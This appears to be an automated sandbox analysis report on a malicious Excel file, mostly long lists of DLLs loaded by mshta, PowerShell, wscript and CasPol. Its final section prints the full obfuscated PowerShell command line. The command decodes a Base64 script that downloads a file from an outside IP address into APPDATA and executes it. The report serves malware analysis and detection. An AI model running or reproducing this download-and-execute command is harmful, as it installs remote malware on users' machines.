                  Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: shcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: webio.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: atl.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: pstorec.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: atl.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ucrtbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wsock32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: shcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
                  Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.pdb source: powershell.exe, 00000007.00000002.467820686.0000000002594000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.pdbhP source: powershell.exe, 00000007.00000002.467820686.0000000002594000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.pdb source: powershell.exe, 00000012.00000002.499810498.0000000002583000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.pdbhP source: powershell.exe, 00000012.00000002.499810498.0000000002583000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: .pdb- source: powershell.exe, 00000007.00000002.474546983.000000001C398000.00000004.00000020.00020000.00000000.sdmp
                  Source: 0200011080.xlsInitial sample: OLE indicators encrypted = True

                  Data Obfuscation

                  barindex
                  PowerShell case anomaly found
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
